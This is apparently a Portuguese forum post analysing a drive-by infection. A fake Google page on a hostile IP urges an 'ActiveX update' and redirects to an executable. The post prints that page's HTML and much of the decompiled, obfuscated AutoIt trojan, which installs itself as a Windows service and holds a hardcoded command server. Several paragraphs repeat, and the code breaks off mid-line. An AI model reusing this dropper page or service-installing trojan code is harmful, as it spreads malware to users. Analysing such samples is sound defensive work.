Fui chamado para resolver problemas de conectividade em uma empresa da região.
Não demorei muito para ver o problema: havia uma mensagem de erro e um download quando acessava websites grandes, como o Google.
Era exibida uma página, vinda do endereço IP 190.120.227.114. O servidor usava Apache 2.2.14 em um Ubuntu 4.15.
Uma mensagem pedia para atualizar o ActiveX, e aparecia em todos os navegadores.
Porém, quando fui tentar fazer uma pesquisa no Google usando a ferramenta de pesquisa "digitando na barra de endereço" do Chrome, ele me retornou um erro 404, dizendo que o Google usava Apache e Ubuntu.
O Google sanitiza páginas de erro e usa um servidor web chamado GWS (Google WebServer - uma compilação do próprio Apache). Definitivamente aquele não era o Google.
Pensei em várias coisas, algum tipo de spoofing, mas o problema não ocorria com outras máquinas da mesma rede.
Então, resolvi baixar o suposto arquivo "atualizador de ActiveX" que a mensagem sugeria.
Ele estava em um diretório chamado "app", e era executável. Quando tentei acessar um possível Index do Apache no diretório "app" me retornou um erro 500 (Internal Server Error). Possivelmente um .htaccess mal escrito.
Tudo bem. Arquivo baixado, ele tinha o ícone padrão do Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Sei que AutoIt, quando não instalado e configurado o AutoItWrapper, em seus arquivos compilados deixa a versão da linguagem usada. Atualmente, estamos na versão 3 e alguma coisa. Aquele arquivo era escrito na versão 1.0.0.2.
Código-fonte do arquivo baixado:
Informações do IP
Informações do dono
Entrei em contato com o webhoster via chat:
Logo quando tiver tempo vou enviar este e-mail e estudar melhor este código-fonte, e uma forma de remoção. Também vou estar enviando para AV researchers.
Por uma rápida olhada, parece ser um trojan, ou servidor de botnet, que notifica o servidor remoto, mas o código está muito ofuscado e cansativo de se ler.
Você pode baixar o código-fonte completo do vírus, bem como binários, Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Não execute os arquivos se não souber o que está fazendo.
Não demorei muito para ver o problema: havia uma mensagem de erro e um download quando acessava websites grandes, como o Google.
Era exibida uma página, vinda do endereço IP 190.120.227.114. O servidor usava Apache 2.2.14 em um Ubuntu 4.15.
Uma mensagem pedia para atualizar o ActiveX, e aparecia em todos os navegadores.
Código:
Send: Return Code: 0x00000000 GET / HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: pt-br User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2) Accept-Encoding: gzip, deflate Host: www.google.com.br Connection: Keep-Alive Receive: Return Code: 0x00000000 HTTP/1.1 200 OK Date: Thu, 12 Jul 2012 19:05:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.15 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 378 Connection: close Content-Type: text/html Receive: Return Code: 0x00000000 00000000 1F 8B 08 00 00 00 00 00 00 03 85 50 5F 4B E3 40 ...........P_K.@ 00000010 10 7F 36 9F 62 BA 4F 0A 26 63 11 A1 B5 49 E1 2E .6.b.O.&c...I.. 00000020 2D 28 A8 57 24 D2 BB 27 19 93 B5 5D 49 77 E3 EE -(.W$..'...]Iw.. 00000030 A4 89 CA 7D DA 7B B8 AF E1 A6 A9 E0 81 70 4F 3B ...}.{.......pO; 00000040 3B FC FE 4E 3C 98 FD 48 B3 5F 8B 39 AC 79 53 C2 ;..N<..H._.9.yS. 00000050 E2 EE FB D5 65 0A 22 44 5C 9E A6 88 B3 6C 06 3F ....e."D\....l.? 00000060 2F B2 EB 2B 18 46 27 90 59 D2 4E B1 32 9A 4A C4 /..+.F'.Y.N.2.J. 00000070 F9 8D 00 B1 66 AE CE 11 9B A6 89 9A D3 C8 D8 15 ....f........... 00000080 66 B7 D8 76 5A C3 8E BC 1F 43 FE C4 8C 0A 2E C4 f..vZ....C...... 00000090 34 88 77 86 ED A6 D4 2E F9 42 66 38 1E 8F 7B F6 4.w......Bf8..{. 000000A0 0E 2B A9 F0 CF 46 32 41 87 0D E5 73 AD B6 89 48 .+...F2A...s...H 000000B0 8D 66 A9 39 CC 5E 2A 29 20 EF 7F 89 60 D9 32 76 .f.9.^*) ..`.2v 000000C0 DC 09 E4 6B B2 4E 72 A2 9C 09 47 A3 B3 71 38 14 ...k.Nr...G..q8. 000000D0 80 5E 8A 15 97 72 FA 2D 67 B5 95 2D 2C 95 2E 4C .^...r.-g..-,..L 000000E0 E3 60 26 1D 71 4D A5 7A A5 C2 C4 D8 83 82 D8 E5 .`&.qM.z........ 000000F0 56 55 0C EC 5D F6 E2 4F B4 A5 7E EB E3 3D D6 3A VU..]..O..~..=.: 00000100 EF BA 41 5D 15 C4 F2 F0 08 DE 82 03 2A A5 E5 43 ..A]........*..C 00000110 31 B7 D6 80 A6 2E DB A3 5A D5 96 FE FE 31 50 74 1.......Z....1Pt 00000120 AB AD 5C 79 13 7B 0C 4A 3B F6 68 30 40 55 A9 72 ..\y.{.J;.h0@U.r 00000130 F2 91 3C 44 C2 47 12 CF 18 88 A3 49 70 D0 EC 52 ..<D.G.....Ip..R 00000140 46 A5 E9 30 DE 2E 01 81 54 55 98 9A CD DA 38 BE F..0....TU....8. 00000150 F7 73 24 5B 29 26 C1 EF 20 C6 3E 9E 4F 8F FB EB .s$[)&.. .>.O... 00000160 3D 98 E2 E5 FF 65 3E 3A 4C FE 91 D8 73 77 47 9D =....e>:L...swG. 00000170 BE 03 69 12 CF 7B 35 02 00 00 ..i..{5...
Código HTML:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Activex Windows Desatualizado</title> <script type="text/javascript"> function update() { alert("Erro na configuração do navegador, instale o aplicativo de atualização!"); window.location = "/app/Comhost_app.exe"; } </script> </head> <body> <script type="text/javascript"> update(); </script> </body> </html>
O Google sanitiza páginas de erro e usa um servidor web chamado GWS (Google WebServer - uma compilação do próprio Apache). Definitivamente aquele não era o Google.
Pensei em várias coisas, algum tipo de spoofing, mas o problema não ocorria com outras máquinas da mesma rede.
Então, resolvi baixar o suposto arquivo "atualizador de ActiveX" que a mensagem sugeria.
Ele estava em um diretório chamado "app", e era executável. Quando tentei acessar um possível Index do Apache no diretório "app" me retornou um erro 500 (Internal Server Error). Possivelmente um .htaccess mal escrito.
Tudo bem. Arquivo baixado, ele tinha o ícone padrão do Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Sei que AutoIt, quando não instalado e configurado o AutoItWrapper, em seus arquivos compilados deixa a versão da linguagem usada. Atualmente, estamos na versão 3 e alguma coisa. Aquele arquivo era escrito na versão 1.0.0.2.
Código-fonte do arquivo baixado:
Código:
#NoTrayIcon #RequireAdmin Global $Var0001 = "auto_7" Global $Var0002 = "Auto 7" Global $Var0003 = "gb_service.exe" Global $Var0004 = "http://190.120.227.114" Global Const $Var0005 = "ServicesActive" Global Const $Var0006 = 0x00010000 Global Const $Var0007 = 0x00020000 Global Const $Var0008 = 0x00040000 Global Const $Var0009 = 0x00080000 Global Const $Var0010 = BitOR($Var0006, $Var0007, $Var0008, $Var0009) Global Const $Var0011 = 1 Global Const $Var0012 = 2 Global Const $Var0013 = 1 Global Const $Var0014 = 0x00000010 Global Const $Var0015 = 0x00000020 Global Const $Var0016 = 0x00000080 Global Const $Var0017 = 0x000f01ff Global Const $Var0018 = 1 Global Const $Var0019 = 2 Global Const $Var0020 = 3 Global Const $Var0021 = 4 Global Const $Var0022 = 14 Global Const $Var0023 = 1 Global Const $Var0024 = 2 Global Const $Var0025 = 3 Global Const $Var0026 = 4 Global Const $Var0027 = 5 Global Const $Var0028 = 6 Global Const $Var0029 = 7 Global Const $Var0030 = 8 Global Const $Var0031 = 9 Global Const $Var0032 = 1 Global Const $Var0033 = 2 Global Const $Var0034 = 4 Global Const $Var0035 = 8 Global Const $Var0036 = BitOR($Var0032, $Var0033, $Var0035) Global Const $Var0037 = 0x00000010 Global Const $Var0038 = 0x00000020 Global Const $Var0039 = BitOR($Var0037, $Var0038) Global Const $Var0040 = 0x00000100 Global Const $Var0041 = BitOR($Var0039, $Var0034, $Var0036, $Var0040) Global Const $Var0042 = 2 Global Const $Var0043 = 0 Global Const $Var0044 = 1 Global Const $Var0045 = 2 Global Const $Var0046 = 3 Global Const $Var0047 = 4 Global Const $Var0048 = 7 Global Const $Var0049 = 1 Global Const $Var0050 = 0x00000080 Global Const $Var0051 = 1 Global Const $Var0052 = 2 Global Const $Var0053 = BitOR($Var0051, $Var0052) Global Const $Var0054 = 0x00000078 Global Const $Var0055 = 0 Global $Var0056, $Var0057, $Var0058, $Var0059, $Var0060 = False Global $Var0061 = DllStructCreate("dword dwServiceType;" & "dword dwCurrentState;dword dwControlsAccepted;dword dwWin32ExitCode;" & "dword dwServiceSpecificExitCode;dword dwCheckPoint;dword dwWaitHint") Global $Var0062 Global $Var0063 Global $Var0064 Global $Var0065 = 1 Global $Var0066 = DllOpen("advapi32.dll") Global $Var0067 Global $Var0068 = "SessionChange" & "_" & @MDAY & "." & @MON & "." & @YEAR & " _ " & @HOUR & "." & @MIN & "." & @SEC & ".log" Global $Var0069 = RegRead("HKEY_LOCAL_MACHINE\Software\SessionChange", "LogfilePath") Global $Var0070 = FileOpen($Var0069 & "\" & $Var0068, 1) Fn0001("", 1) Func Fn0001($__01, $__02 = 0, $__03 = 0) Dim $a57c0301d0f[12] $a57c0301d0f[0] = "January" $a57c0301d0f[1] = "February" $a57c0301d0f[2] = "March" $a57c0301d0f[3] = "April" $a57c0301d0f[4] = "May" $a57c0301d0f[5] = "June" $a57c0301d0f[6] = "July" $a57c0301d0f[7] = "August" $a57c0301d0f[8] = "September" $a57c0301d0f[9] = "October" $a57c0301d0f[10] = "November" $a57c0301d0f[11] = "December" If @HOUR > 12 Then $a05d0f01132 = @HOUR - 12 $a47e020130c = " PM" Else $a05d0f01132 = @HOUR $a47e020130c = " AM" EndIf If $__02 = 1 Then Local $locVar0001 = "Log created: " & $a57c0301d0f[@MON - 1] & " " & @MDAY & ", " & @YEAR & " : " & $a05d0f01132 & ":" & @MIN & ":" & @SEC & $a47e020130c Fn0002(StringLen($locVar0001), "_") FileWriteLine($Var0070, $locVar0001) Fn0002(StringLen($locVar0001), "_") FileWriteLine($Var0070, @CRLF & @CRLF) Else Local $locVar0001 = "" For $a26f0801633 = 1 To $__03 $locVar0001 = $locVar0001 & @CRLF Next $locVar0001 = $locVar0001 & $a57c0301d0f[@MON - 1] & " " & @MDAY & ", " & @YEAR & " : " & $a05d0f01132 & ":" & @MIN & ":" & @SEC & $a47e020130c & " [" & @AutoItPID & "] >> " & $__01 FileWriteLine($Var0070, $locVar0001) EndIf EndFunc Func Fn0002($__01, $__02) Local $locVar0001 = "" For $a26f0801633 = 1 To $__01 $locVar0001 = $locVar0001 & $__02 Next FileWriteLine($Var0070, $locVar0001) EndFunc Global Const $Var0071 = "struct;long X;long Y;endstruct" Global Const $Var0072 = "struct;long Left;long Top;long Right;long Bottom;endstruct" Global Const $Var0073 = "struct;word Year;word Month;word Dow;word Day;word Hour;word Minute;word Second;word MSeconds;endstruct" Global Const $Var0074 = "struct;hwnd hWndFrom;uint_ptr IDFrom;INT Code;endstruct" Global Const $Var0075 = "uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;int SelectedImage;int OverlayImage;" & "int Indent;lparam Param" Global Const $Var0076 = $Var0074 & ";uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;" & "int SelectedImage;int OverlayImage;int Indent;lparam Param" Global Const $Var0077 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;" & "word MinSecond;word MinMSecond;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;" & "word MaxMinute;word MaxSecond;word MaxMSecond;bool MinValid;bool MaxValid" Global Const $Var0078 = "dword Length;dword Reserved;dword RecordNumber;dword TimeGenerated;dword TimeWritten;dword EventID;" & "word EventType;word NumStrings;word EventCategory;word ReservedFlags;dword ClVar0255ingRecordNumber;dword StringOffset;" & "dword UserSidLength;dword UserSidOffset;dword DataLength;dword DataOffset" Global Const $Var0079 = "byte CLSID[16];byte FormatID[16];ptr CodecName;ptr DllName;ptr FormatDesc;ptr FileExt;" & "ptr MimeType;dword Flags;dword Version;dword SigCount;dword SigSize;ptr SigPattern;ptr SigMask" Global Const $Var0080 = "struct;uint Mask;int Item;int SubItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;lparam Param;" & "int Indent;int GroupID;uint Columns;ptr pColumns;ptr piColFmt;int iGroup;endstruct" Global Const $Var0081 = $Var0074 & ";int Item;int SubItem;uint NewState;uint OldState;uint Changed;" & "struct;long ActionX;long ActionY;endstruct;lparam Param" Global Const $Var0082 = "struct;" & $Var0074 & ";dword dwDrawStage;handle hdc;" & $Var0072 & ";dword_ptr dwItemSpec;uint uItemState;lparam lItemlParam;endstruct" & ";dword clrText;dword clrTextBk;int iSubItem;dword dwItemType;dword clrFace;int iIconEffect;" & "int iIconPhase;int iPartId;int iStateId;struct;long TextLeft;long TextTop;long TextRight;long TextBottom;endstruct;uint uAlign" Global Const $Var0083 = $Var0074 & ";int Index;int SubItem;uint NewState;uint OldState;uint Changed;" & $Var0071 & ";lparam lParam;uint KeyFlags" Global Const $Var0084 = "uint Size;" & $Var0071 & ";uint Hit;" & $Var0073 & ";" & $Var0072 & ";int iOffset;int iRow;int iCol" Global Const $Var0085 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short Span" Global Const $Var0086 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short MinSet;short MaxSet" Global Const $Var0087 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds" Global Const $Var0088 = $Var0074 & ";struct;word BegYear;word BegMonth;word BegDOW;word BegDay;word BegHour;word BegMinute;word BegSecond;word BegMSeconds;endstruct;" & "struct;word EndYear;word EndMonth;word EndDOW;word EndDay;word EndHour;word EndMinute;word EndSecond;word EndMSeconds;endstruct" Global Const $Var0089 = "struct;uint Mask;handle hItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;int SelectedImage;" & "int Children;lparam Param;endstruct" Global Const $Var0090 = $Var0074 & ";uint Action;" & "struct;uint OldMask;handle OldhItem;uint OldState;uint OldStateMask;" & "ptr OldText;int OldTextMax;int OldImage;int OldSelectedImage;int OldChildren;lparam OldParam;endstruct;" & "struct;uint NewMask;handle NewhItem;uint NewState;uint NewStateMask;" & "ptr NewText;int NewTextMax;int NewImage;int NewSelectedImage;int NewChildren;lparam NewParam;endstruct;" & "struct;long PointX;long PointY;endstruct" Global Const $Var0091 = "struct;" & $Var0074 & ";dword DrawStage;handle HDC;" & $Var0072 & ";dword_ptr ItemSpec;uint ItemState;lparam ItemParam;endstruct" & ";dword ClrText;dword ClrTextBk;int Level" Global Const $Var0092 = "uint Size;uint Mask;uint Type;uint State;uint ID;handle SubMenu;handle BmpChecked;handle BmpUnchecked;" & "ulong_ptr ItemData;ptr TypeData;uint CCH;handle BmpItem" Global Const $Var0093 = "uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;" & "int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;" & "uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader;" & $Var0072 & ";uint uChevronState" Global Const $Var0094 = $Var0074 & ";bool fChanged;" & "struct;long TargetLeft;long TargetTop;long TargetRight;long TargetBottom;endstruct;" & "struct;long ActualLeft;long ActualTop;long ActualRight;long ActualBottom;endstruct" Global Const $Var0095 = $Var0074 & ";uint uBand;uint wID;" & "struct;long CLeft;long CTop;long CRight;long CBottom;endstruct;" & "struct;long BLeft;long BTop;long BRight;long BBottom;endstruct" Global Const $Var0096 = $Var0074 & ";int iItem;" & "struct;int iBitmap;int idCommand;byte fsState;byte fsStyle;dword_ptr dwData;int_ptr iString;endstruct" & ";int cchText;ptr pszText;" & $Var0072 Global Const $Var0097 = "dword StructSize;hwnd hwndOwner;handle hInstance;ptr lpstrFilter;ptr lpstrCustomFilter;" & "dword nMaxCustFilter;dword nFilterIndex;ptr lpstrFile;dword nMaxFile;ptr lpstrFileTitle;dword nMaxFileTitle;" & "ptr lpstrInitialDir;ptr lpstrTitle;dword Flags;word nFileOffset;word nFileExtension;ptr lpstrDefExt;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName;ptr pvReserved;dword dwReserved;dword FlagsEx" Global Const $Var0098 = "struct;dword Size;long Width;long Height;word Planes;word BitCount;dword Compression;dword SizeImage;" & "long XPelsPerMeter;long YPelsPerMeter;dword ClrUsed;dword ClrImportant;endstruct;dword RGBQuad" Global Const $Var0099 = "dword cbSize;" & $Var0072 & ";int dxyLineButton;int xyThumbTop;" & "int xyThumbBottom;int reserved;dword rgstate[6]" Global Const $Var0100 = "long Height;long Width;long Escapement;long Orientation;long Weight;byte Italic;byte Underline;" & "byte Strikeout;byte CharSet;byte OutPrecision;byte ClipPrecision;byte Quality;byte PitchAndFamily;wchar FaceName[32]" Global Const $Var0101 = "dword Size;ptr Reserved1;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;" & "dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved3;handle StdInput;" & "handle StdOutput;handle StdError" Global Const $Var0102 = "dword Length;ptr Descriptor;bool InheritHandle" Global Const $Var0103 = "long tmHeight;long tmAscent;long tmDescent;long tmInternalLeading;long tmExternalLeading;" & "long tmAveCharWidth;long tmMaxCharWidth;long tmWeight;long tmOverhang;long tmDigitizedAspectX;long tmDigitizedAspectY;" & "wchar tmFirstChar;wchar tmLastChar;wchar tmDefaultChar;wchar tmBreakChar;byte tmItalic;byte tmUnderlined;byte tmStruckOut;" & "byte tmPitchAndFamily;byte tmCharSet" Global Const $Var0104 = 0x00020000 Global Const $Var0105 = 0x000f0000 Global Const $Var0106 = $Var0104 Global Const $Var0107 = $Var0104 Global Const $Var0108 = 0x001f0000 Func Fn0003($__01 = @error, $__02 = @extended) Local $locVar0001 = DllCall("kernel32.dll", "dword", "GetLastError") Return SetError($__01, $__02, $locVar0001[0]) EndFunc Global Const $Var0109 = Ptr(-1) Global Const $Var0110 = Ptr(-1) Global Const $Var0111 = 0x00000100 Global Const $Var0112 = 0x00002000 Global Const $Var0113 = 0x00008000 Global Const $Var0114 = BitShift($Var0111, 8) Global Const $Var0115 = BitShift($Var0112, 8) Global Const $Var0116 = BitShift($Var0113, 8) Global Const $Var0117 = "dword Length;dword MemoryLoad;" & "uint64 TotalPhys;uint64 AvailPhys;uint64 TotalPageFile;uint64 AvailPageFile;" & "uint64 TotalVirtual;uint64 AvailVirtual;uint64 AvailExtendedVirtual" Func Fn0004($__01 = 0, $__02 = True, $__03 = True, $__04 = "") Local $locVar0001 = "wstr" If $__04 = "" Then $__04 = 0 $locVar0001 = "ptr" EndIf Local $locVar0002 = DllCall("kernel32.dll", "handle", "CreateEventW", "ptr", $__01, "bool", $__02, "bool", $__03, $locVar0001, $__04) If @error Then Return SetError(@error, @extended, 0) Return $locVar0002[0] EndFunc Func Fn0005($__01) Local $locVar0001 = DllCall("kernel32.dll", "bool", "SetEvent", "handle", $__01) If @error Then Return SetError(@error, @extended, False) Return $locVar0001[0] EndFunc Func Fn0006($__01, $__02, $__03, $__04, $__05, $__06, $__07 = Default, $__08 = Default, $__09 = Default, $__10 = Default, $__11 = Default, $__12 = "") Local $locVar0001, $locVar0002, $locVar0003, $locVar0004, $locVar0005, $locVar0006, $locVar0007, $locVar0008 $locVar0001 = DllStructCreate("wchar[" & Number($__07 <> Default) * (StringLen($__07) + 1) & "]") DllStructSetData($locVar0001, 1, $__07) $locVar0002 = DllStructCreate("dword[" & Number($__08) & "]") If IsArray($__09) Then Local $locVar0009, $locVar0010 $locVar0009 = UBound($__09) - 1 For $a2fd190023a = 0 To $locVar0009 $locVar0010 &= "wchar[" & StringLen($__09[$a2fd190023a]) + 1 & "];" Next $locVar0003 = DllStructCreate(StringTrimRight($locVar0010, 1)) For $a2fd190023a = 0 To $locVar0009 DllStructSetData($locVar0003, $a2fd190023a + 1, $__09[$a2fd190023a]) Next Else $locVar0003 = DllStructCreate("wchar[" & Number($__09 <> Default) * (StringLen($__09) + 1) & "]") DllStructSetData($locVar0003, 1, $__09) EndIf $locVar0004 = DllStructCreate("wchar[" & Number($__10 <> Default) * (StringLen($__10) + 1) & "]") DllStructSetData($locVar0004, 1, $__10) $locVar0005 = DllStructCreate("wchar[" & Number($__11 <> Default) * (StringLen($__11) + 1) & "]") DllStructSetData($locVar0005, 1, $__11) $locVar0006 = Fn0014($__12, $Var0012) $locVar0007 = DllCall($Var0066, "ptr", "CreateServiceW", "ptr", $locVar0006, "wstr", $__01, "wstr", $__02, "dword", $Var0017, "dword", $__03, "dword", $__04, "dword", $__05, "wstr", $__06, "ptr", DllStructGetPtr($locVar0001), "ptr", DllStructGetPtr($locVar0002), "ptr", DllStructGetPtr($locVar0003), "ptr", DllStructGetPtr($locVar0004), "ptr", DllStructGetPtr($locVar0005)) If $locVar0007[0] = 0 Then $locVar0008 = Fn0003() Else Fn0012($locVar0007[0]) EndIf Fn0012($locVar0006) Return SetError($locVar0008, DllStructGetData($locVar0002, 1), Number($locVar0007[0] <> 0)) EndFunc Func Fn0007($__01, $__02 = "") Local $locVar0001, $locVar0002, $locVar0003, $locVar0004 $locVar0001 = Fn0014($__02, $Var0011) $locVar0002 = Fn0015($locVar0001, $__01, $Var0006) $locVar0003 = DllCall($Var0066, "int", "DeleteService", "ptr", $locVar0002) If $locVar0003[0] = 0 Then $locVar0004 = Fn0003() Fn0012($locVar0002) Fn0012($locVar0001) Return SetError($locVar0004, 0, $locVar0003[0]) EndFunc Func Fn0008($__01, $__02 = "") Local $locVar0001, $locVar0002 $locVar0001 = Fn0014($__02, $Var0011) $locVar0002 = Fn0015($locVar0001, $__01, $Var0016) Fn0012($locVar0002) Fn0012($locVar0001) Return Number($locVar0002 <> 0) EndFunc Func Fn0009($__01, $__02 = "") Local $locVar0001, $locVar0002, $locVar0003, $locVar0004, $locVar0005, $locVar0006, $locVar0007 $locVar0001 = Fn0014($__02, $Var0011) $locVar0002 = Fn0015($locVar0001, $__01, $Var0013) $locVar0003 = Fn0016($locVar0002, 0, 0) $locVar0004 = DllStructCreate("ubyte[" & $locVar0003[4] & "]") $locVar0005 = Fn0016($locVar0002, DllStructGetPtr($locVar0004), DllStructGetSize($locVar0004)) If $locVar0005[0] = 0 Then $locVar0006 = Fn0003() Fn0012($locVar0002) Fn0012($locVar0001) $locVar0007 = DllStructCreate("dword[3];uint_ptr[2];dword;uint_ptr[3]", $locVar0005[2]) Return SetError($locVar0006, 0, DllStructGetData($locVar0007, 1, 1)) EndFunc Func Fn0010($__01, $__02 = "") Local $locVar0001, $locVar0002, $locVar0003, $locVar0004 $locVar0001 = Fn0014($__02, $Var0011) $locVar0002 = Fn0015($locVar0001, $__01, $Var0014) $locVar0003 = DllCall($Var0066, "int", "StartServiceW", "ptr", $locVar0002, "dword", 0, "ptr", 0) If $locVar0003[0] = 0 Then $locVar0004 = Fn0003() Fn0012($locVar0002) Fn0012($locVar0001) Return SetError($locVar0004, 0, $locVar0003[0]) EndFunc Func Fn0011($__01, $__02 = "") Local $locVar0001, $locVar0002, $locVar0003, $locVar0004 $locVar0001 = Fn0014($__02, $Var0011) $locVar0002 = Fn0015($locVar0001, $__01, $Var0015) $locVar0003 = Fn0013($locVar0002, $Var0018) If $locVar0003 = 0 Then $locVar0004 = Fn0003() Fn0012($locVar0002) Fn0012($locVar0001) Return SetError($locVar0004, 0, $locVar0003) EndFunc Func Fn0012($__01) Local $locVar0001 = DllCall($Var0066, "int", "ClVar0255eServiceHandle", "ptr", $__01) If @error Then Return SetError(@error, 0, 0) Return $locVar0001[0] EndFunc Func Fn0013($__01, $__02) Local $locVar0001 = DllCall($Var0066, "int", "ControlService", "ptr", $__01, "dword", $__02, "ptr*", 0) If @error Then Return SetError(@error, 0, 0) Return $locVar0001[0] EndFunc Func Fn0014($__01, $__02) Local $locVar0001 = DllCall($Var0066, "ptr", "OpenSCManagerW", "wstr", $__01, "wstr", $Var0005, "dword", $__02) If @error Then Return SetError(@error, 0, 0) Return $locVar0001[0] EndFunc Func Fn0015($__01, $__02, $__03) Local $locVar0001 = DllCall($Var0066, "ptr", "OpenServiceW", "ptr", $__01, "wstr", $__02, "dword", $__03) If @error Then Return SetError(@error, 0, 0) Return $locVar0001[0] EndFunc Func Fn0016($__01, $__02, $__03) Local $locVar0001 = DllCall($Var0066, "int", "QueryServiceConfigW", "ptr", $__01, "ptr", $__02, "dword", $__03, "dword*", 0) Return $locVar0001 EndFunc Func Fn0017($__01) $Var0063 = Fn0009($__01) $Var0057 = DllCallbackRegister("Fn0020", "dword", "dword;dword;ptr;ptr") $Var0058 = DllCallbackRegister("Fn0018", "none", "dword;ptr") $Var0059 = DllStructCreate("ptr[2];ptr[2]") $Var0056 = DllStructCreate("wchar[128]") DllStructSetData($Var0056, 1, $__01) DllStructSetData($Var0059, 1, DllStructGetPtr($Var0056), 1) DllStructSetData($Var0059, 1, DllCallbackGetPtr($Var0058), 2) DllStructSetData($Var0059, 2, 0, 1) DllStructSetData($Var0059, 2, 0, 2) DllCall($Var0066, "int", "StartServiceCtrlDispatcherW", "ptr", DllStructGetPtr($Var0059)) DllCallbackFree($Var0058) DllCallbackFree($Var0057) EndFunc Func Fn0018($__01, $__02) Local $locVar0001 = DllCall($Var0066, "ptr", "RegisterServiceCtrlHandlerExW", "ptr", DllStructGetPtr($Var0056), "ptr", DllCallbackGetPtr($Var0057), "ptr", 0) If @error OR ($locVar0001[0] = 0) Then Exit $Var0062 = $locVar0001[0] If NOT $Var0062 Then Fn0019() Return EndIf DllStructSetData($Var0061, "dwServiceType", $Var0063) DllStructSetData($Var0061, "dwServiceSpecificExitCode", 0) If NOT (Fn0021($Var0045, $Var0055, 0x00000bb8)) Then Fn0019() Return EndIf Fn0023($__01, $__02) Fn0043() EndFunc Func Fn0019() If $Var0062 Then Fn0021($Var0044, $Var0055, 0) EndFunc Func Fn0020($__01, $__02, $__03, $__04) #forceref $A4A82503603, $A2082605313, $A4582700A29 Local $locVar0001 = $Var0055 Switch $__01 Case $Var0018 Fn0021($Var0046, $Var0055, 0x00000bb8) Fn0024() Return $Var0055 Case $Var0019 DllStructSetData($Var0061, "dwCurrentState", $Var0048) Case $Var0020 DllStructSetData($Var0061, "dwCurrentState", $Var0047) Case $Var0021 Case $Var0022 Local $locVar0002 = DllStructCreate("dword cbsize; dword dwSessionId", $__03) Local $locVar0003 = DllStructGetData($locVar0002, "cbSize") Local $locVar0004 = DllStructGetData($locVar0002, "dwSessionId") Fn0001("cbSize = " & $locVar0003 & " ,dwSessionId = " & $locVar0004) Switch $__02 Case $Var0023 Fn0001("Console session connected", 0, 2) Case $Var0024 Fn0001("Console session disconnected", 0, 2) Case $Var0025 Fn0001("Remote session connected", 0, 2) Case $Var0026 Fn0001("Remote session disconnected", 0, 2) Case $Var0027 Fn0001("Session logged on", 0, 2) Case $Var0028 Fn0001("Session logged off", 0, 2) Case $Var0029 Fn0001("Session locked", 0, 2) Case $Var0030 Fn0001("Session unlocked", 0, 2) Case $Var0031 Fn0001("Session remote control", 0, 2) EndSwitch Case 0x00000080 To 0x000000ff Case Else $locVar0001 = $Var0054 EndSwitch Fn0021(DllStructGetData($Var0061, "dwCurrentState"), $Var0055, 0) Return $locVar0001 EndFunc Func Fn0021($__01, $__02, $__03) Local $locVar0001 = True If NOT $Var0060 Then If ($__01 = $Var0045) Then DllStructSetData($Var0061, "dwControlsAccepted", 0) Else DllStructSetData($Var0061, "dwControlsAccepted", BitOR($Var0049, $Var0050)) EndIf DllStructSetData($Var0061, "dwCurrentState", $__01) DllStructSetData($Var0061, "dwWin32ExitCode", $__02) DllStructSetData($Var0061, "dwWaitHint", $__03) If ($__01 = $Var0047) OR ($__01 = $Var0044) Then DllStructSetData($Var0061, "dwCheckPoint", 0) Else $Var0065 += 1 DllStructSetData($Var0061, "dwCheckPoint", $Var0065) EndIf $locVar0001 = Fn0022($Var0062, DllStructGetPtr($Var0061)) EndIf Return $locVar0001 EndFunc Func Fn0022($__01, $__02) Local $locVar0001 = DllCall($Var0066, "int", "SetServiceStatus", "ptr", $__01, "ptr", $__02) If @error OR NOT $locVar0001[0] Then Return 0 Return $locVar0001[0] EndFunc Func Fn0023($__01, $__02) If NOT Fn0021($Var0045, $Var0055, 0x00000bb8) Then Return $Var0067 = 1 $Var0064 = Fn0004(0, True, False, "") Return Fn0021($Var0047, $Var0055, 0) EndFunc Func Fn0024() $Var0067 = 0 If $Var0064 Then Fn0005($Var0064) EndFunc Global Const $Var0118 = 8 Global Const $Var0119 = 0x00000010 Global Const $Var0120 = 1 Global Const $Var0121 = 4 Global Const $Var0122 = 2 Global Const $Var0123 = BitOR($Var0120, $Var0122, 